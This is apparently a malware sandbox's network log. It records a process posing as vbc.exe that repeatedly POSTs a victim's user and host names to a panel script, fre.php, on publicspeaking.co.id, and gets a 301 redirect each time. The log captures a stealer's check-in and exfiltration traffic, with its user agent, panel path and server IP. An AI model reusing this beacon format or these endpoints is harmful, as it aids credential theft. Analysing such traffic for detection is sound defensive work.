                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:34.840003967 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  44192.168.2.54993092.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:35.105237961 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:35.225030899 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:36.785753012 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:36 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 7fff955c2b065b1759fabeaf13b836e6-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.336
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:36.786768913 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  45192.168.2.54993492.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:37.064186096 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:37.184149981 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:38.783813953 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:38 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: ef37bf536dc047c18adf8a17578a8505-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.376
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:38.783854008 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  46192.168.2.54994092.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:39.071338892 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:39.191137075 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:40.663906097 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 5ec3f1f4ae7d37ac07318032bfee6904-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:40.663966894 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  47192.168.2.54994492.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:41.096642971 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:41.217228889 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:42.776597023 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:42 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 1acc5474d7611d4ea109b832262b16f2-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.334
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:42.776618004 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  48192.168.2.54995092.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:43.053759098 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:43.173669100 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:44.747859001 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:44 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: d80c7fb23386808b4411983e2a38e91a-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.334
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:44.747922897 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  49192.168.2.54995592.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:45.014931917 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:45.134598970 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:46.742389917 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:46 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 9dfa15b15f57c085a68a2969f2493403-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.378
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:46.742428064 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  50192.168.2.54995992.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:47.012166977 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:47.131865025 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:48.702753067 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: a7f440ad6fdfc6b41ece58e3d1014ecb-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.343
